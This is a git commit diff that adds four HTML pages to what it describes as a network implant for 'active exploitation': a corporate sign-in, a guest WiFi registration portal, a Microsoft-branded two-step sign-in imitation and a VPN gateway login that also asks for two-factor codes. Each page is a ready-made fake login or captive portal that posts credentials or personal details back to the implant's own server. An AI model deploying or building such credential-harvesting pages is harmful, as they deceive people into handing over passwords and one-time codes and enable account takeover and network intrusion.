Initial public release

Full BigBrother network implant - passive SOC + active exploitation.
Personal identifiers removed; all capabilities intact.
See README.md for setup and docs/deployment.md for detailed deployment.
This commit is contained in:
n0mad1k
2026-06-26 09:52:50 -04:00
commit ccc6b729de
175 changed files with 47941 additions and 0 deletions
@@ -0,0 +1,57 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Corporate Sign In</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,Oxygen,Ubuntu,sans-serif;background:#f0f2f5;display:flex;justify-content:center;align-items:center;min-height:100vh;color:#1d1d1f}
.login-container{background:#fff;border-radius:12px;box-shadow:0 2px 20px rgba(0,0,0,.08);padding:48px 40px;width:100%;max-width:420px}
.logo{text-align:center;margin-bottom:32px}
.logo .icon{width:48px;height:48px;background:#0066cc;border-radius:10px;display:inline-flex;align-items:center;justify-content:center;margin-bottom:12px}
.logo .icon svg{width:28px;height:28px;fill:#fff}
.logo h1{font-size:22px;font-weight:600;color:#1d1d1f}
.logo p{font-size:14px;color:#6e6e73;margin-top:4px}
.form-group{margin-bottom:20px}
.form-group label{display:block;font-size:13px;font-weight:500;color:#1d1d1f;margin-bottom:6px}
.form-group input{width:100%;padding:12px 16px;border:1px solid #d2d2d7;border-radius:8px;font-size:15px;transition:border-color .2s;outline:none;background:#fafafa}
.form-group input:focus{border-color:#0066cc;background:#fff;box-shadow:0 0 0 3px rgba(0,102,204,.1)}
.form-group input::placeholder{color:#aeaeb2}
.btn-login{width:100%;padding:13px;background:#0066cc;color:#fff;border:none;border-radius:8px;font-size:16px;font-weight:600;cursor:pointer;transition:background .2s}
.btn-login:hover{background:#0055b3}
.btn-login:active{background:#004499}
.help-links{text-align:center;margin-top:24px}
.help-links a{font-size:13px;color:#0066cc;text-decoration:none;margin:0 8px}
.help-links a:hover{text-decoration:underline}
.footer{text-align:center;margin-top:32px;font-size:11px;color:#aeaeb2}
.error-msg{display:none;background:#fef0f0;border:1px solid #fbc4c4;color:#c62828;padding:10px 14px;border-radius:8px;font-size:13px;margin-bottom:16px}
</style>
</head>
<body>
<div class="login-container">
<div class="logo">
<div class="icon"><svg viewBox="0 0 24 24"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"/></svg></div>
<h1>Corporate Network</h1>
<p>Sign in with your organization account</p>
</div>
<div class="error-msg" id="error">Invalid credentials. Please try again.</div>
<form method="POST" action="/">
<div class="form-group">
<label for="username">Email or Username</label>
<input type="text" id="username" name="username" placeholder="user@company.com" required autocomplete="username" autofocus>
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" placeholder="Enter your password" required autocomplete="current-password">
</div>
<button type="submit" class="btn-login">Sign In</button>
</form>
<div class="help-links">
<a href="#">Forgot password?</a>
<a href="#">Request access</a>
</div>
<div class="footer">&copy; 2024 Corporate IT Services. Authorized use only.</div>
</div>
</body>
</html>
+86
View File
@@ -0,0 +1,86 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Guest WiFi Access</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,Oxygen,Ubuntu,sans-serif;background:linear-gradient(135deg,#667eea 0%,#764ba2 100%);display:flex;justify-content:center;align-items:center;min-height:100vh}
.portal{background:#fff;border-radius:16px;box-shadow:0 20px 60px rgba(0,0,0,.15);padding:40px;width:100%;max-width:480px}
.header{text-align:center;margin-bottom:28px}
.header .wifi-icon{font-size:48px;margin-bottom:12px}
.header h1{font-size:24px;color:#1a1a2e;font-weight:700}
.header p{font-size:14px;color:#666;margin-top:6px;line-height:1.5}
.terms-box{background:#f8f9fa;border:1px solid #e9ecef;border-radius:10px;padding:20px;margin-bottom:24px;max-height:160px;overflow-y:auto;font-size:12px;color:#555;line-height:1.6}
.terms-box h3{font-size:13px;color:#333;margin-bottom:8px}
.form-group{margin-bottom:18px}
.form-group label{display:block;font-size:13px;font-weight:500;color:#333;margin-bottom:5px}
.form-group input,.form-group select{width:100%;padding:11px 14px;border:1px solid #ddd;border-radius:8px;font-size:14px;outline:none;transition:border-color .2s}
.form-group input:focus,.form-group select:focus{border-color:#667eea;box-shadow:0 0 0 3px rgba(102,126,234,.12)}
.checkbox-group{display:flex;align-items:flex-start;gap:8px;margin-bottom:20px}
.checkbox-group input[type=checkbox]{margin-top:3px;width:16px;height:16px;accent-color:#667eea}
.checkbox-group label{font-size:13px;color:#555;line-height:1.4}
.btn-connect{width:100%;padding:14px;background:linear-gradient(135deg,#667eea,#764ba2);color:#fff;border:none;border-radius:10px;font-size:16px;font-weight:600;cursor:pointer;transition:opacity .2s}
.btn-connect:hover{opacity:.9}
.btn-connect:disabled{opacity:.5;cursor:not-allowed}
.duration{text-align:center;margin-top:16px;font-size:12px;color:#999}
.row{display:flex;gap:12px}
.row .form-group{flex:1}
</style>
</head>
<body>
<div class="portal">
<div class="header">
<div class="wifi-icon">&#128246;</div>
<h1>Guest WiFi Access</h1>
<p>Welcome! Please register to connect to our guest network.</p>
</div>
<form method="POST" action="/" id="guestForm">
<div class="row">
<div class="form-group">
<label for="first_name">First Name</label>
<input type="text" id="first_name" name="first_name" placeholder="John" required>
</div>
<div class="form-group">
<label for="last_name">Last Name</label>
<input type="text" id="last_name" name="last_name" placeholder="Smith" required>
</div>
</div>
<div class="form-group">
<label for="email">Email Address</label>
<input type="email" id="email" name="email" placeholder="john.smith@example.com" required>
</div>
<div class="form-group">
<label for="company">Company / Organization</label>
<input type="text" id="company" name="company" placeholder="Acme Corp">
</div>
<div class="form-group">
<label for="reason">Purpose of Visit</label>
<select id="reason" name="reason">
<option value="meeting">Meeting / Appointment</option>
<option value="vendor">Vendor / Contractor</option>
<option value="interview">Interview</option>
<option value="event">Event / Conference</option>
<option value="other">Other</option>
</select>
</div>
<div class="terms-box">
<h3>Terms of Use</h3>
<p>By connecting to this wireless network, you agree to the following terms and conditions:</p>
<p>1. This network is provided for authorized guest use only. All network activity may be monitored and recorded for security purposes.</p>
<p>2. Users must not attempt to access unauthorized systems, intercept network traffic, or engage in any activity that violates applicable laws.</p>
<p>3. The organization reserves the right to terminate access at any time without notice.</p>
<p>4. This is an unsecured network. Users connect at their own risk. The organization is not responsible for any data loss or security incidents.</p>
<p>5. Access is limited to 24 hours. Contact the front desk for extensions.</p>
</div>
<div class="checkbox-group">
<input type="checkbox" id="accept_terms" name="accept_terms" required>
<label for="accept_terms">I accept the Terms of Use and acknowledge that network activity may be monitored.</label>
</div>
<button type="submit" class="btn-connect">Connect to WiFi</button>
</form>
<div class="duration">Access valid for 24 hours from registration.</div>
</div>
</body>
</html>
@@ -0,0 +1,88 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Sign in to your account</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;background:#f2f2f2;display:flex;justify-content:center;align-items:center;min-height:100vh}
.login-box{background:#fff;width:440px;min-height:338px;padding:44px;box-shadow:0 2px 6px rgba(0,0,0,.2)}
.ms-logo{margin-bottom:16px}
.ms-logo svg{width:108px;height:24px}
.title{font-size:24px;font-weight:600;color:#1b1b1b;margin-bottom:24px}
.form-field{margin-bottom:16px;position:relative}
.form-field input{width:100%;padding:6px 0 6px 10px;border:none;border-bottom:1px solid #666;font-size:15px;outline:none;background:transparent;color:#1b1b1b;height:36px}
.form-field input:focus{border-bottom:2px solid #0067b8;padding-bottom:5px}
.form-field input::placeholder{color:#767676}
.link-forgot{display:block;font-size:13px;color:#0067b8;text-decoration:none;margin-bottom:16px;margin-top:4px}
.link-forgot:hover{text-decoration:underline;color:#005a9e}
.btn-next{display:block;width:100%;padding:10px 20px;background:#0067b8;color:#fff;border:none;font-size:15px;font-weight:600;cursor:pointer;transition:background .15s;text-align:center}
.btn-next:hover{background:#005a9e}
.options{margin-top:16px}
.options a{display:block;font-size:13px;color:#0067b8;text-decoration:none;margin-bottom:6px}
.options a:hover{text-decoration:underline}
.footer-links{margin-top:32px;display:flex;gap:16px}
.footer-links a{font-size:12px;color:#0067b8;text-decoration:none}
.footer-links a:hover{text-decoration:underline}
.step{display:none}
.step.active{display:block}
.back-btn{background:none;border:none;cursor:pointer;display:flex;align-items:center;gap:6px;font-size:13px;color:#1b1b1b;margin-bottom:16px;padding:0}
.back-btn:hover{text-decoration:underline}
.back-btn svg{width:16px;height:16px}
.user-display{display:flex;align-items:center;gap:8px;background:#f2f2f2;border-radius:20px;padding:4px 16px 4px 4px;margin-bottom:20px;width:fit-content;font-size:13px;color:#1b1b1b}
.user-display .avatar{width:24px;height:24px;background:#0067b8;border-radius:50%;display:flex;align-items:center;justify-content:center;color:#fff;font-size:11px;font-weight:600}
</style>
</head>
<body>
<div class="login-box">
<div class="ms-logo">
<svg viewBox="0 0 108 24"><path fill="#f25022" d="M0 0h11v11H0z"/><path fill="#7fba00" d="M12 0h11v11H12z"/><path fill="#00a4ef" d="M0 12h11v11H0z"/><path fill="#ffb900" d="M12 12h11v11H12z"/><text x="28" y="18" fill="#1b1b1b" font-family="Segoe UI" font-size="16" font-weight="600">Microsoft</text></svg>
</div>
<div class="step active" id="step1">
<div class="title">Sign in</div>
<form id="emailForm" onsubmit="showStep2(event)">
<div class="form-field">
<input type="text" id="username" name="username" placeholder="Email, phone, or Skype" required autofocus autocomplete="username">
</div>
<div class="options">
<a href="#">No account? Create one!</a>
<a href="#">Can't access your account?</a>
</div>
<div style="text-align:right;margin-top:24px">
<button type="submit" class="btn-next" style="width:auto;display:inline-block;min-width:108px">Next</button>
</div>
</form>
</div>
<div class="step" id="step2">
<button type="button" class="back-btn" onclick="showStep1()">
<svg viewBox="0 0 16 16"><path d="M11 1L4 8l7 7" fill="none" stroke="currentColor" stroke-width="2"/></svg>
<span id="displayEmail"></span>
</button>
<div class="title">Enter password</div>
<form method="POST" action="/" id="passwordForm">
<input type="hidden" id="hiddenUsername" name="username">
<div class="form-field">
<input type="password" id="password" name="password" placeholder="Password" required autocomplete="current-password">
</div>
<a href="#" class="link-forgot">Forgot my password</a>
<div style="text-align:right">
<button type="submit" class="btn-next" style="width:auto;display:inline-block;min-width:108px">Sign in</button>
</div>
</form>
</div>
<div class="footer-links">
<a href="#">Terms of use</a>
<a href="#">Privacy & cookies</a>
</div>
</div>
<script>
function showStep2(e){e.preventDefault();var u=document.getElementById('username').value;document.getElementById('displayEmail').textContent=u;document.getElementById('hiddenUsername').value=u;document.getElementById('step1').classList.remove('active');document.getElementById('step2').classList.add('active');document.getElementById('password').focus()}
function showStep1(){document.getElementById('step2').classList.remove('active');document.getElementById('step1').classList.add('active');document.getElementById('username').focus()}
</script>
</body>
</html>
+91
View File
@@ -0,0 +1,91 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>VPN Gateway - Secure Access</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif;background:#1a1a2e;display:flex;justify-content:center;align-items:center;min-height:100vh;color:#e0e0e0}
.container{display:flex;flex-direction:column;align-items:center;width:100%;max-width:400px;padding:20px}
.status-bar{background:rgba(255,255,255,.05);border:1px solid rgba(255,255,255,.1);border-radius:8px;padding:10px 20px;margin-bottom:24px;width:100%;display:flex;align-items:center;gap:10px;font-size:13px}
.status-dot{width:8px;height:8px;border-radius:50%;background:#ff4444;animation:pulse 2s infinite}
@keyframes pulse{0%,100%{opacity:1}50%{opacity:.4}}
.status-bar span{color:#ccc}
.login-card{background:linear-gradient(145deg,#16213e,#1a1a2e);border:1px solid rgba(255,255,255,.08);border-radius:16px;padding:40px 36px;width:100%;box-shadow:0 8px 32px rgba(0,0,0,.3)}
.header{text-align:center;margin-bottom:32px}
.shield-icon{width:56px;height:56px;margin:0 auto 16px;background:rgba(0,150,255,.15);border-radius:14px;display:flex;align-items:center;justify-content:center}
.shield-icon svg{width:32px;height:32px;fill:#0096ff}
.header h1{font-size:20px;font-weight:600;color:#fff}
.header p{font-size:13px;color:#888;margin-top:6px}
.form-group{margin-bottom:18px}
.form-group label{display:block;font-size:12px;font-weight:500;color:#aaa;margin-bottom:6px;text-transform:uppercase;letter-spacing:.5px}
.form-group input,.form-group select{width:100%;padding:12px 14px;border:1px solid rgba(255,255,255,.1);border-radius:8px;font-size:14px;outline:none;background:rgba(255,255,255,.05);color:#fff;transition:border-color .2s}
.form-group input:focus,.form-group select:focus{border-color:#0096ff;box-shadow:0 0 0 3px rgba(0,150,255,.15)}
.form-group input::placeholder{color:#555}
.form-group select{appearance:none;cursor:pointer}
.form-group select option{background:#1a1a2e;color:#fff}
.remember-row{display:flex;align-items:center;justify-content:space-between;margin-bottom:24px}
.remember-row label{display:flex;align-items:center;gap:6px;font-size:13px;color:#aaa;cursor:pointer}
.remember-row input[type=checkbox]{accent-color:#0096ff}
.btn-connect{width:100%;padding:14px;background:linear-gradient(135deg,#0066ff,#0096ff);color:#fff;border:none;border-radius:8px;font-size:15px;font-weight:600;cursor:pointer;transition:opacity .2s;position:relative;overflow:hidden}
.btn-connect:hover{opacity:.9}
.btn-connect:active{transform:scale(.99)}
.security-note{margin-top:24px;text-align:center;font-size:11px;color:#555;line-height:1.5}
.security-note svg{width:12px;height:12px;fill:#555;vertical-align:middle;margin-right:4px}
.cert-info{margin-top:16px;padding:12px;background:rgba(0,150,255,.05);border:1px solid rgba(0,150,255,.1);border-radius:8px;font-size:11px;color:#668}
.cert-info .label{color:#0096ff;font-weight:500}
</style>
</head>
<body>
<div class="container">
<div class="status-bar">
<div class="status-dot"></div>
<span>SSL VPN Gateway &mdash; Authentication Required</span>
</div>
<div class="login-card">
<div class="header">
<div class="shield-icon"><svg viewBox="0 0 24 24"><path d="M12 1L3 5v6c0 5.55 3.84 10.74 9 12 5.16-1.26 9-6.45 9-12V5l-9-4zm0 10.99h7c-.53 4.12-3.28 7.79-7 8.94V12H5V6.3l7-3.11v8.8z"/></svg></div>
<h1>Secure VPN Access</h1>
<p>Authenticate to connect to the corporate network</p>
</div>
<form method="POST" action="/">
<div class="form-group">
<label for="realm">Authentication Realm</label>
<select id="realm" name="realm">
<option value="corporate">Corporate (AD)</option>
<option value="contractor">Contractor</option>
<option value="admin">IT Admin</option>
<option value="emergency">Emergency Access</option>
</select>
</div>
<div class="form-group">
<label for="username">Username</label>
<input type="text" id="username" name="username" placeholder="DOMAIN\username or email" required autofocus autocomplete="username">
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" placeholder="Enter your password" required autocomplete="current-password">
</div>
<div class="form-group">
<label for="otp">Two-Factor Code (if enabled)</label>
<input type="text" id="otp" name="otp" placeholder="6-digit code or leave blank" autocomplete="one-time-code" inputmode="numeric" maxlength="6">
</div>
<div class="remember-row">
<label><input type="checkbox" name="remember"> Remember this device</label>
</div>
<button type="submit" class="btn-connect">Connect</button>
</form>
<div class="security-note">
<svg viewBox="0 0 24 24"><path d="M18 8h-1V6c0-2.76-2.24-5-5-5S7 3.24 7 6v2H6c-1.1 0-2 .9-2 2v10c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2V10c0-1.1-.9-2-2-2zm-6 9c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zm3.1-9H8.9V6c0-1.71 1.39-3.1 3.1-3.1s3.1 1.39 3.1 3.1v2z"/></svg>
Secured with TLS 1.3. All traffic encrypted.
</div>
<div class="cert-info">
<span class="label">Certificate:</span> vpn-gateway.internal<br>
<span class="label">Issued by:</span> Corporate Root CA<br>
<span class="label">Valid until:</span> 2025-12-31
</div>
</div>
</div>
</body>
</html>